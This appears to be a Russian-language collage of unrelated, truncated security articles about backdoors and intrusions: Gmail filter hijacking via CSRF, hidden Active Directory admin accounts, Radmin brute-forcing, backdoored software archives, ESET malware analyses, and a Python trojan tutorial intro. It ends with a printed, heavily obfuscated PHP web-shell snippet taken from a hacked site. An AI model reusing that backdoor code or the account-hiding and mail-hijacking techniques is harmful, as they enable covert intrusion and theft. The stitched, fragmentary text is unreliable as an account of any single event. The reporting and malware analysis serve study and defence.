Неприятное известие:
Сайт Убунту-ру.орг был отключен, вследствии подозрительной активности. Произошедшее расследуется.

текст в комментарии:
В форуме не хватало последних патчей, и кто-то использовал дырки в безопасности, чтобы установить бэкдоры. Убунту-ру.орг придётся восстанавливать с нуля, посты форума и вики в сохранности, но предположительно будут удалены пароли, для того чтобы их поменять.
В любом случае всё это займёт какое-то время, извините.

источник

Достаточно известный дизайнер месяц назад подвергся атаке [пока] неизвестных скрипт киддисов, которые использовали уязвимость в любимом многими (в том числе мной) Гмыле.
История уже успела хорошо побродить по Сети, но если кто не видел — будет полезна многим. Опущу ненужные подробности (их при желании можно прочесть в официальном обращении Дэвида), попробую передать суть.
Злоумышленники использовали обидно простую брешь в безопасности ГМыла. Скрипты на зараженных сайтах отправляли POST запрос на страницу управления фильтрами в гмыле, при этом, если у юзера была активна сессия в последнем (к примеру, открыт инбокс в соседней вкладке), то запрос успешно исполнялся. А состоял этот запрос в добавлении простенького фильтра Matches: transfer-approval.com Do this: Forward to ba_marame_pooli@yahoo.com, Skip Inbox, Delete it, т.е. в пересылке всех входящих сообщений, содержащих строку 'transfer-approval.com' на указанный адрес, не сохраняя само письмо и форварды в ящике.
Сей эксплойт стар как мир, но я привык, что с его помощью можно от силы переслать все личные сообщения с какого-нибудь форума, но уж никак не атаковать такие серьезные сервисы, как gmail.
Дэвид отделался достаточно легко — у него увели домен с 2к уников в день и требовали $500 за возврат (по прошествии недели, кстати, снизили цену до $250, но он отказался выкупать домен даже за $1 из принципа). Такой «несерьезный» урон обусловлен вполне объективными причинами. Узнав из его блога о том, что он собирается в отпуск, киддисы сделали предположение, что вряд-ли он будет часто проверять свои фильтры и заказали перенос домена черз хелпдеск хостера. Для успешного переноса необходимо подтверждение, приходящее на почту, для этого и был установлен фильтр. Но в теории, если пользователь не пользуется фильтрами вообще, то так можно было в течение длительного времени уводить любые письма, содержащие слово 'password', к примеру.
Сейчас брешь уже заделана.

Мораль — даже у всемогущего Гугла, которого уже многие боятся, могут оказаться совершенно детские уязвимости. А всем разработчикам — на заметку, не допускайте подобного у себя :)

Итак, мы все знаем про подлых пользователей c UID=0 в unix, которых может быть больше одного.

Посмотрим, как такое же (а на самом деле, даже более страшное) организовывается в инфраструктуре Windows. Разумеется, мы говорить будем не про локальные виндовые учётные записи, а про Active Directory, т.е. говорить будем об администраторе домена. Или, даже, хуже, об enterprise administrator.

Итак, истина номер один: у объектов в active directory есть атрибуты и права доступа.
Истина номер два: эти атрибуты можно менять.

Как легко понять, мы МОЖЕМ сделать учётную запись с фантастическими правами, к которой не будет доступа НИ У КОГО. Однако, он сможет логиниться, блокировать, разблокировать, менять свои атрибуты и атрибуты чужих людей.

В самом страшном случае, это будет пользователь с волшебным SID-*500, которого не позволяет удалить уже сама винда. (Для этого нужно переименовать, а на его место положить другого пользователя с ником Administrator и с полными правами).

Некоторые версии Unreal3.2.8.1.tar.gz на официальных зеркалах содержали бэкдор, который позволяет выполнять любые команды с привилегиями пользователя, от имени которого загружен ircd.
Разработчики уверяют, что сделают все, что бы такого не повторилось, и рекомендуют пользователям не относиться легкомысленно к PGP/GPG подписям

Суть проблемы

Wikipedia:

Radmin (Remote Administrator) — условно бесплатная программа удалённого администрирования ПК для платформы Microsoft Windows, которая позволяет полноценно работать на нескольких удалённых компьютерах с помощью графического интерфейса. Кроме этого, программа позволяет передавать файлы и использовать режим голосового или текстового общения с пользователем удаленного компьютера.

Radmin состоит из 2х частей: клиентской (Radmin Viewer) и серверной (Radmin Server)....

Кто-то ставит себе эту программу сам, а кто-то даже не знает, что она у него есть... А есть она во многих самодельных сборках Windows XP, например в ZverCD.. Причем процесс (файл) Radmin Server может быть переименован под что-то вполне безобидное.

Прямо сейчас орда анонимусов с несколькольких имиджборд проводит рейд незащищенным тылам компьютеров рунета. Подбирают простые и не очень пароли к интерфейсу Radmin Server на порту 4899, после чего компьютер оказывается в полной власти анархистов.

Далее следует:
*Воровство денег из ЭПС.
1) установка троянов;
2) воровство сохраненных паролей почты и соц сетей;
3) копирование личных фото и видео записей и последующее размещение их в Сети.

Недавно аналитики ESET обнаружили интересную вредоносную программу – Win32/Sheldor.NAD, которая является модификацией популярного ПО для удаленного администрирования компьютера – TeamViewer.

Данные сведения были получены при проведении экспертизы в рамках расследования инцидента, инициированного Group-IB и связанного с мошенничеством в системах ДБО. При этом злоумышленники умудрились провести несколько поддельных транзакций и похитить около 5 миллионов рублей.

Win32/Sheldor.NAD – устанавливается посредством троянской программы-инсталлятора, которая внедряет в систему модифицированную версию популярного пакета для удаленного администрирования — TeamViewer пятой версии. Причем многие компоненты содержат легальную цифровую подпись:

В свое время, менее года назад, на хабре мелькала публикация с аналогичным заголовком [1]. В ней автор предлагал способ по сокрытию привилегий администратора домена путем использования в качестве контейнера, для размещения «скрытой» учетной записи, служебное хранилище «Program data», в совокупностью с агрессивным разграничением прав с целью предотвращения доступа к «спрятанной» учетной записи. Однако, несмотря на заверения автора, обнаружение «скрытой» учетной записи и ее последующее удаление можно было выполнить всего в несколько кликов.

Еще первого июня этого года на Хабре появилась статья "Эпоха антивирусов на Mac OS X пришла официально". И действительно, сейчас стали появляться вирусы и scareware под Mac OS X, не такие уж и опасные, но зато пугающие «маководов», привыкших к безопасности своей ОС, до дрожи в коленках. Паника заставила Apple выдать «на гора» Internet Security. Возможно, эта штука поможет пользователям Mac OS X защититься от очередного бэкдора, обнаруженного случайно одним пользоавателем. Насколько известно, это третий бэкдор для указанной операционной системы дальше будет больше.

Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же. Немного опережу события и скажу, что это бэкдор созданный из радмина второй ветки и кое-что еще)
Полученный файл: kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию — это какая-то книга, почему в exe — непонятно, глядим далее.
Воспользуемся PEiD:

UPX 0.89.6 — 1.02 / 1.05 — 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
Попробуем распаковать винраром, получим два файла:

Сергей Скоробогатов, который недавно обнаружил бэкдор в китайском чипе FPGA, произвел успешное извлечение ключа AES, который отмечен как «высокозащищенный» и «практически неломаемый», на FPGA военного уровня Actel/Microsemi ProASIC3 за 0.01 секунду.
Использовался способ анализа сторонних каналов, который назвается Pipeline Emission Analysis (PEA).
Это не новый способ сам по себе, а значительно улучшенный метод волнового анализа.
Данный способ, как подсказывает Ocelot, используется для атаки на реализацию AES на FPGA, используя наводки и помехи.
Подробнее (pdf)

Я недавно наткнулся на статью, описывающую простейший грувлет, позволяющий исполнить любой код на Groovy у Вас на сервере. Мне это показалось очень удобным для организации отладочного бэкдора.

Проблема в то, что грувлеты — это всё таки сервер, а у нас есть еще толстый клиент на Swing. Для него мне хотелось бы сделать нечто похожее, но встраивание какого нибудь embedded Jetty или Tomcat только для этого в клиент выглядело как то слишком.

По счастью, мне попалась на глаза и другая статья — про наличие в стандартной библиотеке Java простейшего веб сервера. Вот им то я и решил воспользоваться.

Специалистам по безопасности трёх стран впервые удалось выудить из человеческого мозга важную информацию. Причём данные о банковских счетах, дате рождения и месте нахождения участников исследования были получены относительно простым способом.

Intro

Порой, когда вы реверсите или атакуете программу, полезно иметь возможность загрузить и выполнить свой код в контексте исследуемого процесса. Крадете ли вы хэши паролей или получаете доступ к удаленному рабочему столу целевой системы, методы внедрения кода и dll-библиотек предоставляют мощные возможности. Мы создадим несколько простых утилит на Питоне, которые позволят вам использовать оба метода. Эти методы должны входить в арсенал каждого разработчика программ, эксплойтов, шелл-кодов и пентестеров. Мы будем использовать внедрение DLL (DLL injection) для запуска всплывающего окна внутри другого процесса. Так же мы будем использовать внедрение кода (code injection), чтобы протестировать шелл-код, разработанный для уничтожения какого-либо процесса основываясь на его PID. Под конец главы мы создадим и скомпилируем Trojan’a (с функционалом backdoor’a) полностью написанного на Python. В большей степени он будет опираться на внедрении кода и использовании некоторых других скрытых тактик, которые должен использовать каждый хороший бэкдор. Давайте начнем с рассмотрения темы создания удаленных потоков, которые являются основой для обоих методов внедрения.

25 сентября стало известно о компрометации одного из корейских зеркал SourceForge (cdnetworks-kr-1).

В архив phpMyAdmin-3.5.2.2-all-languages.zip, находящийся на этом зеркале был внедрен бэкдор.

Так получилось, что передо мной встала задача записывать и хранить видео с IP-камер. Были закуплены и смонтированы камеры Vesta VC-6206 IR без представления архитектуры информационной системы на их основе. Совсем короткий период эксплуатации показал, что камеры имеют свойство зависать и неплохо бы их перезагружать периодически. nmap показывал, что у камеры доступен только telnet, http и rtsp. Ребутать камеру телнетом по крону показалось мне неплохим решением, но рутовый пароль техподдержка дать отказалась.

На прошлой неделе коллеги из Sucuri прислали нам модифицированную версию бинарного файла веб-сервера Apache, который перенаправлял некоторые, адресованные к нему запросы, на набор эксплойтов Blackhole Exploit Kit. Проведенный экспертами нашей антивирусной лаборатории анализ показал, что эта Linux-угроза, получившая название Linux/Cdorked.A, предназначена для перенаправления трафика на вредоносные сайты. Информация Sucuri об этом инциденте.

В процессе анализа мы пришли к выводу, что Linux/Cdorked.A представляет из себя наиболее сложный Linux-бэкдор из всех, что мы видели прежде. С помощью нашей облачной технологии ESET Live Grid мы получили статистику о сотнях скомпрометированных веб-серверов. В отличии от других подобных угроз, бэкдор не оставляет каких-либо следов своей деятельности на жестком диске скомпрометированного хоста, что заметно усложняет его обнаружение. Вместо этого, он хранит всю используемую им информацию в памяти, без привлечения жесткого диска. Кроме этого, злоумышленники используют обфусцированные HTTP-запросы для передачи служебной информации вредоносному коду, которые не фиксируются в лог-файле работы Apache. Таким образом следы взаимодействия вредоносного кода с C&C сервером также отсутствуют.

Недавно мы столкнулись с интересным образцом вредоносного кода, который обнаруживается ESET как Win32/Syndicasec.A. Он обращал на себя внимание по ряду следующих причин:

• Наша система телеметрии показывает весьма небольшой масштаб заражений данной угрозой, а география распространения ограничивается такими странами как Непал и Китай. Предыдущие версии этого вредоносного кода фиксировались нами начиная с 2010 года.
• Полезная нагрузка представляет из себя небольшой фрагмент кода на Javascript, который регистрируется с использованием подсистемы Windows WMI.
• Бэкдор использует веб-сайты поддельных блогов для получения информации о командных C&C серверах. Эти веб-сайты размещаются на доменах, зарегистрированных в Тибете.
• По своим характеристикам эта операция очень похожа на предыдущие шпионские кампании, направленные против тибетских активистов, такие как OS X Lamadai и другие.

Мы провели детальное исследование этого бэкдора и выяснили детали его установки на скомпрометированный компьютер, используемые им механизмы по поддержанию своего присутствия, а также детали взаимодействия с C&C сервером.

В роутерах D-Link (DIR-300revA, DIR-300revB, DIR-600revB) обнаружен backdoor.

Немецкий исследователь просканировал некоторые устройства D-Link nmap-ом и обнаружил открытым порт 23\tcp (telnet).

Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.